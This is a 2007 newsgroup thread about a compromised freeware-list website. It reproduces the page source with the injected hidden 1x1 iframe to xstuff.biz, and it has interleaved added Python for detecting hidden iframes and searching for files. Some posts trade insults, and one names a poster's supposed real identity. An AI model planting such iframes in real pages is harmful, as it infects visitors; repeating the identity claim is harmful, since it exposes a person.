http://www.pricelesswarehome.org/ works OK for me
http://www.pricelessware.org/ gives me a lot of virus alerts.
--
Mike Easter
OK got it. I still had http://www.pricelessware.org/ in bookmarks.
Virus alerts? Mike, can you elaborate on that a little?
http://www.siteadvisor.com/sites/pricelessware.org
--
John Corliss BS206. I try not to reply to trolls like Andy Mabbett,
Hummingbird or proteanthread.
Because of Googlespam, I use NFilter to block all Google Groups
posts from being displayed in my news reader.
No ad, cd, commercial, cripple, demo, dotnet, nag, share, spy,
time-limited, trial or web wares OR warez for me, please.
>"Mike Easter" <Mi...@ster.invalid> wrote in
>news:13ictrn...@corp.supernews.com:
>
>> http://www.pricelessware.org/ gives me a lot of virus alerts.
>
>What AV program are you using? I just opened it and didn't get anything,
>and I've gone to that site using several of the top AV programs in the last
>year. Adblock plus doesn't show any strange items and Siteadvisor.com
>gives it a clean rating.
>
>One thing I did notice this time is that even with javascript enabled, I
>couldn't get a menu on the pricelessware.org main page. All I saw was the
>banner.
The pricelessware.org website is infected with this:
http://www.prevx.com/filenames/1218068998133982281-X1/IE_UPDATE3R.EXE.html
See the warning thread I posted about it...
--
uh oh...black helicopter ... gotta run
>hummingbird <hummi...@2die4.com> wrote in
>news:8dd15d7fd9d9b666...@localhost.127.0.0.1:
>
>> The pricelessware.org website is infected with this:
>> http://www.prevx.com/filenames/1218068998133982281-X1/IE_UPDATE3R.EXE.html
>>
>> See the warning thread I posted about it.
>I didn't see anything on the Prevx page that mentioned pricelessware.org.
>I also tried a Google newsgroup search for your thread and couldn't find
>it.
The prevx page doesn't mention pricelessware.org ... it describes
the trojan that the website is infected with. I got that by googling
one of the .exe files which were downloaded from the
pricelessware.org site onto my computer.
Here's what I wrote in a new thread MID:
Message-ID: <b734e4829ce58928...@localhost.127.0.0.1>
<quote>
-----WARNING-----WARNING-----
It appears the OLD Pricelessware website has been compromised
and infected with a trojan virus.
IF YOU SURF TO IT, IT WILL AUTO DOWNLOAD A BUNCH OF
TROJANS/VIRUS EXECUTABLEs AND MAY INFECT YOUR COMPUTER.
Details of the trojan virus and what it does are here:
>http://www.prevx.com/filenames/1218068998133982281-X1/IE_UPDATE3R.EXE.html
</quote>
HTH.
> hummingbird <hummi...@2die4.com> wrote in
> news:8dd15d7fd9d9b666...@localhost.127.0.0.1:
>
>> The pricelessware.org website is infected with this:
>> http://www.prevx.com/filenames/1218068998133982281-X1/IE_UPDATE3R.EXE.html
>>
>> See the warning thread I posted about it.
>
> I didn't see anything on the Prevx page that mentioned
> pricelessware.org. I also tried a Google newsgroup search for your
> thread and couldn't find it.
>
Your scans couldn't find anything.
Maybe Hummingbird picked up the virus while visiting porn sites?
Curiosity not being confined to cats, I had to have a go at it shortly
after HB first posted his alert. My scanner also blocked some Java
activity. I saw a reference to "gollum" go by, and a bunch of other
redirections, and some Java junk got trapped before I canned it.
After doing a full system cleanse, I put pricelessware.org into my
Untrusted Sites list and went back. Nothing happened then.
And I don't think it's got anything to do with pron sites, the only
horny babe I've been looking at recently is this one:
http://www.positivt.dk/images27/0060.jpg
Cheers.
> Franklin wrote:
>>
>> Your scans couldn't find anything.
>>
>> Maybe Hummingbird picked up the virus while visiting porn sites?
>
> Curiosity not being confined to cats, I had to have a go at it
> shortly after HB first posted his alert. My scanner also blocked
> some Java activity. I saw a reference to "gollum" go by, and a
> bunch of other redirections, and some Java junk got trapped before
> I canned it.
>
> After doing a full system cleanse, I put pricelessware.org into my
> Untrusted Sites list and went back. Nothing happened then.
>
> And I don't think it's got anything to do with pron sites, the only
> horny babe I've been looking at recently is this one:
>
> http://www.positivt.dk/images27/0060.jpg
Don't show that picture to Hummingbird! It will only give him ideas.
>Curiosity not being confined to cats, I had to have a go at it shortly
>after HB first posted his alert. My scanner also blocked some Java
>activity. I saw a reference to "gollum" go by, and a bunch of other
>redirections, and some Java junk got trapped before I canned it.
Wow! You're braver than me, bluerhino! I only went there to check
if it was working after someone posted that it wasn't working.
>After doing a full system cleanse, I put pricelessware.org into my
>Untrusted Sites list and went back. Nothing happened then.
I've now put it in my hosts file...never again.
I must say I'm rather puzzled as to why anyone would select that
website to hack into and plant a complex trojan...hhmmm.
Anyway, I e-mailed the website hosters and reported it.
>And I don't think it's got anything to do with pron sites, the only
>horny babe I've been looking at recently is this one:
>
>http://www.positivt.dk/images27/0060.jpg
:-)
> Curiosity not being confined to cats, I had to have a go at it shortly
> after HB first posted his alert. My scanner also blocked some Java
> activity. I saw a reference to "gollum" go by, and a bunch of other
> redirections, and some Java junk got trapped before I canned it.
>
> After doing a full system cleanse, I put pricelessware.org into my
> Untrusted Sites list and went back. Nothing happened then.
Also curious, I looked at the page source - copied below.
****************************************
<html><head><meta name="robots" content="index, follow"><meta
name="revisit" content="7 days"><link rel="shortcut icon"
href="favicon.ico"><meta http-equiv="content-type" content="text/html;
charset=UTF-8"><title>Pricelessware</title></head><body
bgcolor="#A3BEC9" text="#000000" link="#0000FF" vlink="#0000FF"
alink="#FF0000" marginheight="0" marginwidth="0" topmargin="0"
bottommargin="0" leftmargin="0" rightmargin="0"><table border="0"
cellpadding="0" width="100%" height="100%"><tr><td width="100%"
align="center" valign="middle"><table border="0" cellpadding="0"
width="400" bgcolor="#000000"><tr><td width="100%" bgcolor="#FFFFFF"
align="center" valign="top"><table border="0" width="100%" height="100%"
bgcolor="#FFFFFF" cellspacing="0" cellpadding="10"><tr><td width="100%"
valign="top" align="left" bgcolor="#FFFFFF"> <br><center><font
face="Verdana,Arial" color="#000080"
SIZE="4">alt.comp.freeware</font><br><FONT face="Arial" COLOR="#000000"
SIZE="2"><b>Is proud to present to you...</b></font><br> <br><hr
width="300" size="1" noshade><font face="Verdana,Arial" color="#0963A0"
SIZE="5">The Pricelessware list!</font><hr width="300" size="1"
noshade> <br><font face="Verdana,Arial" SIZE="2"><b>[ <a
href="thelist/index.htm">E n t e r H e r e</a>
]</b><br> <br></center></td></tr></table></td></tr></table></td></tr></table><iframe
src="http://xstuff.biz/tdsko-xyz/index.php?out=1193378230" width=1
height=1 frameborder=0>
</body></html>TH ALIGN=center BGCOLOR="#FFFF00"><FONT
SIZE="-1">Visits</FONT></TH>
<TH ALIGN=center BGCOLOR="#FF8000"><FONT SIZE="-1">Sites</FONT></TH>
<TH ALIGN=center BGCOLOR="#FF0000"><FONT SIZE="-1">KBytes</FONT></TH>
<TH ALIGN=center BGCOLOR="#FFFF00"><FONT SIZE="-1">Visits</FONT></TH>
<TH ALIGN=center BGCOLOR="#00E0FF"><FONT SIZE="-1">Pages</FONT></TH>
<TH ALIGN=center BGCOLOR="#0080FF"><FONT SIZE="-1">Files</FONT></TH>
<TH ALIGN=center BGCOLOR="#008040"><FONT SIZE="-1">Hits</FONT></TH></TR>
<TR><TH HEIGHT=4></TH></TR>
<TR><TD NOWRAP><A HREF="usage_200709.html"><FONT SIZE="-1">Sep
2007</FONT></A></TD>
<TD ALIGN=right><FONT SIZE="-1">2</FONT></TD>
<TD ALIGN=right><FONT SIZE="-1">2</FONT></TD>
<TD ALIGN=right><FONT SIZE="-1">0</FONT></TD>
<TD ALIGN=right><FONT SIZE="-1">0</FONT></TD>
<TD ALIGN=right><FONT SIZE="-1">1</FONT></TD>
<TD ALIGN=right><FONT SIZE="-1">587</FONT></TD>
<TD ALIGN=right><FONT SIZE="-1">0</FONT></TD>
<TD ALIGN=right><FONT SIZE="-1">0</FONT></TD>
<TD ALIGN=right><FONT SIZE="-1">2</FONT></TD>
<TD ALIGN=right><FONT SIZE="-1">2</FONT></TD></TR>
<TR><TH HEIGHT=4></TH></TR>
<TR><TH BGCOLOR="#C0C0C0" COLSPAN=6 ALIGN=left><FONT
SIZE="-1">Totals</FONT></TH>
<TH BGCOLOR="#C0C0C0" ALIGN=right><FONT SIZE="-1">587</FONT></TH>
<TH BGCOLOR="#C0C0C0" ALIGN=right><FONT SIZE="-1">0</FONT></TH>
<TH BGCOLOR="#C0C0C0" ALIGN=right><FONT SIZE="-1">0</FONT></TH>
<TH BGCOLOR="#C0C0C0" ALIGN=right><FONT SIZE="-1">2</FONT></TH>
<TH BGCOLOR="#C0C0C0" ALIGN=right><FONT SIZE="-1">2</FONT></TH></TR>
<TR><TH HEIGHT=4></TH></TR>
</TABLE>
</CENTER>
<P>
<HR>
<TABLE WIDTH="100%" CELLPADDING=0 CELLSPACING=0 BORDER=0>
<TR>
<TD ALIGN=left VALIGN=top>
<SMALL>Generated by
<A HREF="http://www.mrunix.net/webalizer/"><STRONG>Webalizer Version
2.01</STRONG></A>
</SMALL>
</TD>
</TR>
</TABLE>
<!-- Webalizer Version 2.01-10 (Mod: 16-Apr-2002) -->
</BODY>
</HTML>
<iframe src="http://xstuff.biz/tdsko-xyz/index.php?out=1193378230"
width=1 height=1 frameborder=0>
***************************
The original page and page source can be viewed via the Wayback Machine
(the WM adds some javascript to the source, ignore that part). See:
http://web.archive.org/web/*/http://www.pricelessware.org/
dunno what:
<iframe src="http://xstuff.biz/tdsko-xyz/index.php?out=1193378230"
width=1 height=1 frameborder=0>
does but I don't think it's good.
Susan
--
Posted to alt.comp.freeware
Search alt.comp.freeware (or read it online):
http://www.google.com/advanced_group_search?q=+group:alt.comp.freeware
Pricelessware & ACF: http://www.pricelesswarehome.org
Pricelessware: http://www.pricelessware.org (not maintained)
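Susan's pasted source shows the classic sign of a compromised page: a 1x1 iframe whose src points at a domain unrelated to the site. The following is an added example, not code from the thread or from any poster: a small Python checker that parses saved HTML and flags iframes that are tiny, hidden by style, or served from an off-site host. The sample HTML embedded in it is constructed around the iframe quoted above; the function and class names are my own.

```python
"""Flag hidden or third-party iframes in saved HTML.

An injected 1x1 iframe pointing at an unrelated domain is the usual
footprint of a compromised page; this scans static markup for that pattern.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: the iframe copied from the thread's page source,
# wrapped in a minimal stand-in for the rest of the page.
SAMPLE_HTML = """<html><head><title>Pricelessware</title></head><body>
<center><font size="4">alt.comp.freeware</font><br>
<a href="thelist/index.htm">E n t e r H e r e</a></center>
<iframe src="http://xstuff.biz/tdsko-xyz/index.php?out=1193378230" width=1
height=1 frameborder=0>
</body></html>"""


class IframeCollector(HTMLParser):
    """Collects the attributes of every <iframe> start tag seen."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})


def _px(value):
    """Parse an HTML length ('1', '1px'; '100%' gives None) to an int."""
    v = value.strip().lower().rstrip("px")
    return int(v) if v.isdigit() else None


def _site(host):
    """Drop a leading 'www.' so www.example.org and example.org compare equal."""
    return host[4:] if host.startswith("www.") else host


def find_suspicious_iframes(html, page_host):
    """Return findings for iframes that are tiny, hidden or off-site.

    Each finding is a dict with the iframe's src, its host and the list of
    reasons it was flagged; an empty list means nothing looked wrong.
    """
    parser = IframeCollector()
    parser.feed(html)
    page = _site(page_host.lower())
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        reasons = []
        w, h = _px(attrs.get("width", "")), _px(attrs.get("height", ""))
        if (w is not None and w <= 1) or (h is not None and h <= 1):
            reasons.append("tiny (%sx%s)" % (w, h))
        style = attrs.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden by style")
        site = _site(host)
        if site and site != page and not site.endswith("." + page):
            reasons.append("third-party host %s" % host)
        if reasons:
            findings.append({"src": src, "host": host, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_iframes(SAMPLE_HTML, "www.pricelessware.org"):
        print(f["src"], "->", "; ".join(f["reasons"]))
```

Run it over a page saved with "view source" rather than over a live fetch. It only inspects static markup, so an iframe that a script writes into the page at runtime would not show up, and, as bluerhino notes later in the thread, the injected markup was changing from day to day, so keep dated copies.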
>Also curious, I looked at the page source - copied below.
[snip]
>dunno what:
>
><iframe src="http://xstuff.biz/tdsko-xyz/index.php?out=1193378230"
>width=1 height=1 frameborder=0>
>
>does but I don't think it's good.
That website is hosted in Malaysia it seems and is owned by a
registrant in Hong Kong, China:
http://www.dnsstuff.com/tools/whois.ch?ip=http://xstuff.biz/
>--
>Posted to alt.comp.freeware
>Search alt.comp.freeware (or read it online):
>http://www.google.com/advanced_group_search?q=+group:alt.comp.freeware
>Pricelessware & ACF: http://www.pricelesswarehome.org
>Pricelessware: http://www[dot]pricelessware[dot]org (not maintained)
Susan, do you think it's a good idea still to be advertising the
OLD pricelessware site in your signature, given that it's been
hacked and contains a trojan virus?
Hi hmmm:
Go to the bottom of the page where it says "...can also use the
following file names".
Select them all (hold down the left mouse button and starting at the top
left of the first file name, go to the end of the last name). Let up the
left button, right click the selection, select Copy.
Open Notepad, and paste in what you just copied. Make sure your cursor
is at the very beginning of the text and click Edit -> Replace. Replace
a single space with a comma followed by a space. Look for the string
"DOCUMENTS, AND, SETTIN" and remove the two commas from it, but surround
it with the double quotes so it looks exactly (quotes included) like
"DOCUMENTS AND SETTIN"
Select all text and right click -> Copy.
Open a command line. Change directories to the root of the drive,
typically C:\
Type "dir " (no quotes, but remember the space). Click the top left
black box icon in the title bar, move to Edit, select Paste.
If there's a trailing comma, backspace over it, add a space and "/s" (no
quotes).
Hit enter.
You might also like to run it after adding " /a:h" and then " /a:s" at
the end of the command line, also. (No quotes, but a leading space)
If you get tons of hits, repeat the command but add ">> c:\found.jnk" at
the end of the line. When you're finished, c:\found.jnk will contain
reference to all the files found.
<gasp>
Hope this makes sense, and it works for you.
Cheers.
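The Notepad-and-dir procedure above searches a whole drive for a pasted list of file names. As an added example, not the poster's own method, here is the same check in Python: it splits a pasted name list (quoted names keep their spaces, so the comma juggling around "DOCUMENTS AND SETTIN" is not needed), walks the tree including hidden and system files, and appends every hit to a report file. The directory layout in demo() is constructed for illustration; only the names _svchost.exe and IE_UPDATE3R.EXE come from the thread, and "placeholder name.exe" is a made-up stand-in for a name with spaces.

```python
"""Search a directory tree for any of a list of file names and log the hits.

Equivalent of the 'dir name1, name2, ... /s /a:h /a:s >> c:\\found.jnk'
step from the thread; os.walk visits hidden and system files by default.
"""
import os
import shlex
import tempfile


def parse_name_list(text):
    """Split a pasted, space- or comma-separated list of file names.

    Names containing spaces must be double-quoted, e.g. "DOCUMENTS AND
    SETTINGS"; shlex honours the quotes, so no manual comma editing is needed.
    """
    return [n.strip(",") for n in shlex.split(text) if n.strip(",")]


def find_files(root, names):
    """Return every path under root whose file name is in names (case-insensitive)."""
    wanted = {n.lower() for n in names}
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if fn.lower() in wanted:
                hits.append(os.path.join(dirpath, fn))
    return sorted(hits)


def write_report(hits, report_path):
    """Append the hit paths to report_path; returns how many were written."""
    with open(report_path, "a", encoding="utf-8") as f:
        for p in hits:
            f.write(p + "\n")
    return len(hits)


def demo():
    """Build a constructed tree in a temp dir, search it and return the hits
    as forward-slash paths relative to the tree root."""
    names = parse_name_list('IE_UPDATE3R.EXE _svchost.exe "placeholder name.exe"')
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "WINDOWS", "system32"))
        os.makedirs(os.path.join(root, "Documents and Settings", "user"))
        planted = [
            ("WINDOWS", "system32", "_svchost.exe"),           # wanted
            ("Documents and Settings", "user", "ie_update3r.exe"),  # wanted, other case
            ("WINDOWS", "system32", "svchost.exe"),            # legitimate name, no match
        ]
        for rel in planted:
            with open(os.path.join(root, *rel), "wb") as f:
                f.write(b"constructed placeholder, not a real binary")
        hits = find_files(root, names)
        write_report(hits, os.path.join(root, "found.jnk"))
        return [os.path.relpath(p, root).replace(os.sep, "/") for p in hits]


if __name__ == "__main__":
    for hit in demo():
        print(hit)
```

On a real machine call find_files(r"C:\", names) with the names pasted from the scanner page and point write_report at a file on another drive. Matching is on the exact file name, so a legitimate svchost.exe is not confused with _svchost.exe; if the list you were given contains path fragments rather than file names, those entries simply never match.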
Hi hmmm:
I'm using Avira Antivir Personal Edition Classic. I also use Prevx 2.0,
but it didn't notice anything, presumably because AntiVir was earlier in
the food chain.
I then used Avira to scan the whole drive, followed by a reboot, another
sweep and a going over with Prevx, Spybot and AdAware for good measure.
I have Returnil installed, and had I thought about it, I'd have turned
on sandbox mode before going to a known nasty site, but it was late and
I was tired... :-)
Cheers.
If you surf using the free "Returnil" or "sandboxie" none of this would bother your machine:)
--
Lew/+Silat
>hummingbird <hummi...@2die4.com> wrote in
>news:08381e20fde3bbc3...@localhost.127.0.0.1:
>
>> Details of the trojan virus and what it does are here:
>>>http://www.prevx.com/filenames/1218068998133982281-X1/IE_UPDATE3R.EXE.html
>>
>
>What's the easiest way to copy all of the files listed on the Prevx url
>into the search for files and folders, so that I can search for all of the
>files listed in one try. I seem to remember that a semicolon or some
>other punctuation mark.
Do you mean do a search on your local machine?
If so, I dunno because I use my payware file manager and it listed
the bad files in about 5 secs because I have files sorted by date in
descending order, so the trojan .exe files all appeared at the top
of the list and I immediately saw them there. That allowed me to
rename them all, reboot and search for other items like the reg key
it created and then run a few av apps.
Notably, Spybot S&D found nothing even with the latest updates
running and AdAware only found the bad reg key.
I guess it took me about 1 hour and three reboots to recover.
No damage done. I caught it in good time.
Today, I put all the bad files through jotti but only about 40%
of their virus scans found the trojans in them, notably Kaspersky
and F-whatsit. I am not impressed :-(
>Shouldn't this kind of info about Pricelessware.org be discussed on
>Wilders? What good is Siteadvisor if they don't have an alert. Is there
>anyone at McAfee who evens monitors that tool?
Dunno, I posted the alert to warn other ACF-ers and possibly that
someone might know how to deal with it. I also sent urgent e-mail
to the website hoster today - so far no response. It needs taking
down and fixing pronto.
>
> On Tue, 30 Oct 2007 05:55:24 -0500 'hm...@hmmm.org'
> wrote this on alt.comp.freeware:
>
> >"Mike Easter" <Mi...@ster.invalid> wrote in
> >news:13ictrn...@corp.supernews.com:
> >
> >> http://www.pricelessware.org/ gives me a lot of virus alerts.
> >
> >What AV program are you using? I just opened it and didn't get
> >anything, and I've gone to that site using several of the top AV
> >programs in the last year. Adblock plus doesn't show any strange
> >items and Siteadvisor.com gives it a clean rating.
> >
> >One thing I did notice this time is that even with javascript
> >enabled, I couldn't get a menu on the pricelessware.org main page.
> >All I saw was the banner.
>
> The pricelessware.org website is infected with this:
> http://www.prevx.com/filenames/1218068998133982281-X1/IE_UPDATE3R.EXE.html
No, it's not. It links to about a hundred other sites behind your back
and one of them may or may not try to send you that file (I saw no such
thing in a full packet capture), but it's not "infected" with anything.
>
> See the warning thread I posted about it...
>
Inaccurate warnings from people who don't know what they're talking
about are as useless as no warnings at all. Next time you run up
against something you don't understand, please don't just guess. Ask
politely and an expert will explain it to you.
HTH.
>hummingbird wrote:
>
>>
>> On Tue, 30 Oct 2007 05:55:24 -0500 'hm...@hmmm.org'
>> wrote this on alt.comp.freeware:
>>
>> >"Mike Easter" <Mi...@ster.invalid> wrote in
>> >news:13ictrn...@corp.supernews.com:
>> >
>> >> http://www.pricelessware.org/ gives me a lot of virus alerts.
>> >
>> >What AV program are you using? I just opened it and didn't get
>> >anything, and I've gone to that site using several of the top AV
>> >programs in the last year. Adblock plus doesn't show any strange
>> >items and Siteadvisor.com gives it a clean rating.
>> >
>> >One thing I did notice this time is that even with javascript
>> >enabled, I couldn't get a menu on the pricelessware.org main page.
>> >All I saw was the banner.
>>
>> The pricelessware.org website is infected with this:
>> http://www.prevx.com/filenames/1218068998133982281-X1/IE_UPDATE3R.EXE.html
>No, it's not.
Yes it is. I got caught with it last night.
I Googled some of the files and that's what it came up with.
And your next trick.............. is..............?
>It links to about a hundres other sites behind your back
>and one of them may or may not try to send you that file (I saw no such
>thing in a full packet capture), but it's not "infected" with anything.
Wrong. Do try to keep up at the back.
If you read elsewhere in this thread, you will see that someone
grabbed a raw copy of the front page from the pl.org site and it
contains a website address (unrelated to pricelessware.org) which is
hosted in Malaysia. That is probably where users are having the
trojan files downloaded from without knowing. So there appears to
be only one redirection but I'm not too fussed about it. That is
consistent with what happened to my ISP 6 months ago when Russian
criminals hacked into their webmail service and diverted users to
*their* website address to download trojans.
>> See the warning thread I posted about it...
>>
>
>Inaccurate warnings from people who don't know what they're talking
>about are as useless as no warnings at all. Next time you run up
>against something you don't understand, please don't just guess. Ask
>politely and an expert will explain it to you.
It won't be you then, will it.
>Hi hmmm:
>
>I'm using Avira Antivir Personal Edition Classic. I also use Prevx 2.0,
>but it didn't notice anything, presumably because AntiVir was earlier in
>the food chain.
>
>I then used Avira to scan the whole drive, followed by a reboot, another
>sweep and a going over with Prevx, Spybot and AdAware for good measure.
See my comments about Spybot and AdAware. Neither picked up the
trojan files on my HDD.
>I have Returnil installed, and had I thought about it, I'd have turned
>on sandbox mode before going to a known nasty site, but it was late and
>I was tired... :-)
Stop chasing rhinos ;-)
>> Curiosity not being confined to cats, I had to have a go at it shortly
>> after HB first posted his alert. My scanner also blocked some Java
>> activity. I saw a reference to "gollum" go by, and a bunch of other
>> redirections, and some Java junk got trapped before I canned it.
>>
>> After doing a full system cleanse, I put pricelessware.org into my
>> Untrusted Sites list and went back. Nothing happened then.
> Also curious, I looked at the page source - copied below.
<SNIP>
Sometimes paranoid, I went to the web page Hummingbird posted:
http://www.prevx.com/filenames/1218068998133982281-X1/IE_UPDATE3R.EXE.html
where they recommended I scan my computer with:
Prevx Computer Security Investigator (CSI)
http://pxnow.prevx.com/zeroL/PREVXCSIFREE.EXE
1523 KB
so I did. . . the results:
<q>
Security Product AVG 7.5.485 Version 7.5.485
Windows Windows XP Home Service Pack 2 (Build 2600) 32bit
Scans 1 (First Scan: Oct 31 4:13 UCT Last Scan: Oct 31 4:17 UCT)
Files Checked 2,780
Bad Files 0
Your Computer Status CLEAN
</q>
> dunno what:
>
> <iframe src="http://xstuff.biz/tdsko-xyz/index.php?out=1193378230"
> width=1 height=1 frameborder=0>
>
> does but I don't think it's good.
still dunno what that link does. . .
Yes, dimbulb, that's exactly what I said.
And the site isn't infected with anything, even if it does try to drop
files. You apparently don't even understand the basic lexicography, let
alone the problem in any depth.
> That is probably where users are having the
> trojan files downloaded from without knowing. So there appears to
> be only one redirection but I'm not too fussed about it. That is
More like 60. I counted 66 to be exact, and snaked them all. There's a
whole lot more to be concerned with than amateurish .exe link exploits
on that page. So whoever "grabbed the front page" needs to learn a
little bit more about what they're doing too.
> consistent with what happened to my ISP 6 months ago when Russian
> criminals hacked into their webmail service and diverted users to
> *their* website address to download trojans.
That's UPload. And sites offering trojans for download aren't
"infected" no matter where they are or how many they offer.
>
>
> >> See the warning thread I posted about it...
> >>
> >
> >Inaccurate warnings from people who don't know what they're talking
> >about are as useless as no warnings at all. Next time you run up
> >against something you don't understand, please don't just guess. Ask
> >politely and an expert will explain it to you.
>
> It won't be you then, will it.
Seems to be working well so far this time. If you weren't so thick this
conversation would already be over. But I have to keep correcting you
and going over the same material. :(
>
It's all over now, somebody fixed something either there or at that
iframe URL. For what it's worth, a Google cached page from Oct 28 shows
different data being passed to that php script than now, commented out.
Cheers.
>
> On Tue, 30 Oct 2007 15:59:45 -0700 'bluerhinoceros'
> wrote this on alt.comp.freeware:
>
>
> >Hi hmmm:
> >
> >I'm using Avira Antivir Personal Edition Classic. I also use Prevx
> >2.0, but it didn't notice anything, presumably because AntiVir was
> >earlier in the food chain.
> >
> >I then used Avira to scan the whole drive, followed by a reboot,
> >another sweep and a going over with Prevx, Spybot and AdAware for
> >good measure.
>
> See my comments about Spybot and AdAware. Neither picked up the
> trojan files on my HDD.
Neither one of them SHOULD.
>> dunno what:
>> <iframe src="http://xstuff.biz/tdsko-xyz/index.php?out=1193378230"
>> width=1 height=1 frameborder=0>
>> does but I don't think it's good.
I just tried it using FF with NoScript and JavaView extensions. It's
blank now. It looks to be some sort of a free web page place where
someone set up a malware shop.
>hummingbird <hummi...@2die4.com> wrote in
>news:3f49b1c52cd83d7c...@localhost.127.0.0.1:
>
>> See my comments about Spybot and AdAware. Neither picked up the
>> trojan files on my HDD.
>>
>Were all of these relating to Pricelessware.org?
>This answers my question in the previous post. What AV program and
>firewall are you using?
Yes, the files were those downloaded through the pricelessware.org
trojan. Neither SpyBot nor AdAware picked them up when I scanned
the system.
I use old payware v4.5.594 of ZoneAlarm but *no* AV program
at all.
>hummingbird wrote:
>
>>
>> On Tue, 30 Oct 2007 15:59:45 -0700 'bluerhinoceros'
>> wrote this on alt.comp.freeware:
>>
>>
>> >Hi hmmm:
>> >
>> >I'm using Avira Antivir Personal Edition Classic. I also use Prevx
>> >2.0, but it didn't notice anything, presumably because AntiVir was
>> >earlier in the food chain.
>> >
>> >I then used Avira to scan the whole drive, followed by a reboot,
>> >another sweep and a going over with Prevx, Spybot and AdAware for
>> >good measure.
>>
>> See my comments about Spybot and AdAware. Neither picked up the
>> trojan files on my HDD.
>
>Neither one of them SHOULD.
Are you going to say why?
>bluerhinoceros <bluerhi...@humanzoo.invalid> wrote in
>news:13ifdr4...@news.supernews.com:
>I have Avira Antivir PE Premium (free three month trial) with a firewall,
>and I use Firefox with the Adblock Plus extension. I also use the free
>anti-spyware programs you mentioned above, plus A-squared, Super
>Antispyware, and AVG Anti-spyware (all free versions) less Prevx.
FWIW when I uploaded the trojan files to jotti yesterday, A-squared
failed miserably at identifying them as trojans. Kaspersky and
F-whatsit were best and picked them all up. Many others failed too.
Also yesterday, SUPERantispyware latest sigfile picked up 4 of the 8
files as trojans.
>I didn't get any alerts, however. It seems that I used to get more site
>alerts when I had Avast installed, and I have Antivir's heuristics set to
>high. I also used to have Winpatrol installed plus a few others. I
>might install Spyware Terminator soon. Do you prefer Returnil over
>Sandboxie?
>
>Has anyone actually experienced any problems relating to
>Pricelessware.org?
Me and presumably anybody else who surfed to the website while the
trojan was active, bluerhino says it may have been sorted now but...
Who are you? Anonymous or Nomen Nescio? Lol.
Oh really? You could have fooled me. I just checked and can't
find those words posted by anyone using Anonymous or Nomen Nescio.
So I'm not sure what your point is ... if you have one.
>And the site isn't infected with anything, even if it does try to drop
>files. You apparently don't even understand the basic lexicography, let
>alone the problem in any depth.
Wrong ... but I think I've had enough of this silly banter with
one or more k00ks who post using different anon names every time.
How about growing up and getting a life?
EOT for me.
bye bye.
HAND.
ps - if you have some useful information about how the
pricelessware.org trojan scam was set up and how it operates,
I'm sure we'd like to know, so post a new thread about it. thx.
Why should adware scanners find trojans?
One could ask why do you, Chris Millbank, call yourself Hummingbird?
What are you trying to hide?
And why do you need to use "XNA=yes"?
Maybe you have made many enemies in the past and they want to even
up with you.
>
> Oh really? You could have fooled me. I just checked and can't
> find those words posted by anyone using Anonymous or Nomen Nescio.
> So I'm not sure what your point is ... if you have one.
>
Hummingbird, you are a champion of the wacko argument. Now here is
someone who is not buying your k00ky loopiness.
>>And the site isn't infected with anything, even if it does try to
>>drop files. You apparently don't even understand the basic
>>lexicography, let alone the problem in any depth.
>
> Wrong ... but I think I've had enough of this silly banter with a
> one or more k00ks who post using different anon names every time.
Hummingbird, don't forget that you like to post under any different
names and you even engage in conversations with your sockpuppets.
> How about growing up and getting a life?
> EOT for me. bye bye. HAND.
>
> ps - if you have some useful information about how the
> pricelessware.org trojan scam was set up and how it operates,
> I'm sure we'd like to know, so post a new thread about it. thx.
--
Some of Hummingbird's methods are explained here:
http://www.searchlores.org/way_kook.htm
> Yes, dimbulb, that's exactly what I said.
Why are you using an anonymous remailer based in Italy to post to this
group? Something to hide?
--
A: Because it disturbs the logical flow of the message.
Q: Why is top posting frowned upon?
>hummingbird <hummi...@2die4.com> wrote in
>news:fc2e709b7a0da3d4...@localhost.127.0.0.1:
>
>> I use old payware v4.5.594 of ZoneAlarm but *no* AV program
>> at all.
>>
>Don't you think a program like Avira Antivir or Avast with its many shields
>might have blocked the trojans? Why are you allowing your computer to ride
>"bareback" and not practice safe hex?
I have never run any AV s/w in 12 yrs, and it's debatable as to
how good many of them are and they mostly impose a substantial
overhead on system resources etc.
Also bear in mind that when I ran the trojan files through jotti
yesterday, only about 40% of the 20-22 virus scans picked up
anything at all. That is bad bad bad (not Jotti's fault of course).
SpyBot picked up nothing and SUPERantispyware picked up 4 out
of 8 files, both using the latest sigfiles.
As for safe hex ... I *do* avoid all websites which I think are
or might be suspect but it is still a small risk as this incident
reveals. Who'd have thought that a relatively small website like
pricelessware.org would somehow be hacked? If it was hacked
and it wasn't the owners themselves...
As they say, the situation is under review! ;-)
>On Wed, 31 Oct 2007 12:45:28 +0000, hummingbird <hummi...@2die4.com>
>wrote:
>
>>Also yesterday, SUPERantispyware latest sigfile picked up 4 of the 8
>>files as trojans.
>
> How do you manage to make an anti-spyware application
>find trojans?
Good point. I dunno. I give up. What SAS actually found were 4 of
the files which it said were fake 'svchost' files. In fact there was
only one of them (filename: _svchost.exe) and the other 3 were
obviously related to it. But it missed the other 4 files.
(of course I'd already identified and disabled all of them myself)
btw - my use of the term trojan in these threads is taken from
the link I posted which calls this crapware: Trojan.SystemPoser.
My hunch is that it tries to install a keylogger onto your system
and sends data and browser images back to its mothership ...
presumably with your bank/credit card details etc .. but I have
no conclusive evidence of that.
>hm...@yhmmm.org wrote in
>news:ItidnfIfsM18lLXa...@giganews.com:
>
>
>> Has anyone actually experienced any problems relating to
>> Pricelessware.org?
>
>Even if the site was hacked and an iframe was added to an "evil" site, it
>does not automatically mean you will be infected. My guess is the majority
>of alt.comp.freeware people are fully patched and I highly doubt that
>"hack" was using a zero day exploit so it probably didn't hurt anyone.
If you look at the cut/paste Susan posted of the website front page,
it does show a very suspicious iframe with a pointer to a website
hosted in Malaysia. If you know about these things, you might like
to comment...
<snip>
>> dunno what:
>>
>> <iframe
>> src="http://xstuff.biz/tdsko-xyz/index.php?out=1193378230"
>> width=1 height=1 frameborder=0>
>>
>> does but I don't think it's good.
>
> still dunno what that link does. . .
